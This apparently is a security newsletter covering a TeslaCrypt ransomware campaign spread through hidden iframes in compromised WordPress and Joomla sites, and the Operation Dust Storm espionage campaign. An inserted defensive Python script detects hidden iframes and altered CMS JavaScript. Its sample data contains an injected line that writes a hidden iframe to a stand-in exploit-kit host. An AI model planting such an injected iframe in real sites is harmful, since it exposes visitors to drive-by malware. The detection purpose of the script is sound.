Ransomware Campaign Jumps from Wordpress to Joomla

This week, we hear the latest on the Operation Dust Storm cyber-attack campaign and the evolution of a ransomware-phishing campaign that now includes Joomla and WordPress sites.

Malware

Ransomware Campaign Jumps from Wordpress to Joomla

A ransomware-phishing campaign that began earlier this month has expanded from compromised WordPress sites to Joomla sites as well. Initially, the attackers hid an iframe in compromised WordPress pages; the iframe loaded malicious code that redirected visitors to the Nuclear exploit kit, which in turn delivered the TeslaCrypt ransomware. The people behind the campaign have now found a way to inject the same malicious code into the JavaScript files of Joomla sites. Once the ransomware is on the visitor's computer, it encrypts files, locks the PC and demands a ransom to unlock the device and decrypt the content. Compromising legitimate domains is an increasingly popular attack method because of the traffic and exposure those sites already have, and the only way site operators can keep their domains safe is to keep their CMS installations updated and fully patched.

References: Ransomware Scum Add Joomla To Their List | Ransomware Springboards from WordPress to Joomla Domains | TeslaCrypt Ransomware Campaign Extends from WordPress to Joomla Sites

Mitigation Strategies:

  • Log management could detect any suspicious user account activity.
  • A Security Operations Center team provides around-the-clock security monitoring, daily log review, web application firewall management and advanced anomaly detection.
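A defender-side check for the two injection patterns described above (a hidden iframe in served HTML and foreign code appended to a CMS JavaScript file), added here as an example and not taken from the article or from any CMS project; the file path, hostnames and sample content are constructed.

```python
import hashlib
import re

# A hidden iframe: zero width/height or display:none, the form used to pull in
# an exploit-kit landing page without the visitor noticing.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|display\s*:\s*none)[^>]*>",
    re.IGNORECASE)
SRC_ATTR = re.compile(r"src\s*=\s*[\"']([^\"']+)", re.IGNORECASE)


def find_hidden_iframes(html):
    """Return the src of every iframe that is hidden from the viewer."""
    hits = []
    for tag in HIDDEN_IFRAME.finditer(html):
        src = SRC_ATTR.search(tag.group(0))
        hits.append(src.group(1) if src else "")
    return hits


def js_baseline(files):
    """Map file name -> SHA-256 of its content; record this after a clean deploy."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def modified_js(baseline, files):
    """Names of JavaScript files whose hash no longer matches the baseline,
    which is how code appended to a CMS script shows up."""
    current = js_baseline(files)
    return sorted(name for name, digest in current.items()
                  if baseline.get(name) != digest)


# Constructed sample data; the path, hosts and contents are not from any real site.
JS_PATH = "media/jui/js/jquery.min.js"
CLEAN_JS = {JS_PATH: b"/* jquery stub */ (function(){})();\n"}
INJECTED_JS = {JS_PATH: CLEAN_JS[JS_PATH] +
               b"document.write('<iframe src=\"http://ek.example.invalid/gate\" "
               b"width=0 height=0></iframe>');\n"}
SAMPLE_HTML = ('<html><body><p>Welcome</p>'
               '<iframe src="http://ek.example.invalid/landing" width="0" height="0"></iframe>'
               '<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>'
               '</body></html>')

if __name__ == "__main__":
    print("hidden iframes:", find_hidden_iframes(SAMPLE_HTML))
    print("modified JS:", modified_js(js_baseline(CLEAN_JS), INJECTED_JS))
```

Run the hash comparison against the deployed CMS tree after every update and on a schedule, and feed the hidden-iframe check the HTML your site actually serves to visitors, since the injected iframe is only visible in the rendered output.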

Breach

Japanese Critical Infrastructure Targeted by Operation Dust Storm

Researchers at security company Cylance have uncovered an ongoing, evolving cyber-attack campaign that has targeted companies across Asia, Europe, and the United States. The campaign, dubbed Operation Dust Storm, began in 2010 and has been a long-term espionage operation. Recently, its focus has shifted to target solely Japanese companies, both public and private, in the oil/gas, power, transportation, and finance industries. Although the operation has not yet been destructive or disruptive, Cylance's CMO Greg Fitzgerald warns that it is "significantly financed, significantly resourced in terms of personnel and skillset, with a sustained presence…" The group has stayed undetected for so long by registering new domain names, using a variety of unique backdoors, and relying on dynamic DNS.

References: Japanese Infrastructure Targeted In Operation Dust Storm | Operation Dust Storm Hackers Set Sights on Japan's Critical Infrastructure | Japan's Critical Infrastructure Under 'Escalating' Cyber Attack, Says Report

Mitigation Strategies:

Top 20 IP Addresses


*IP addresses provided by Recorded Future.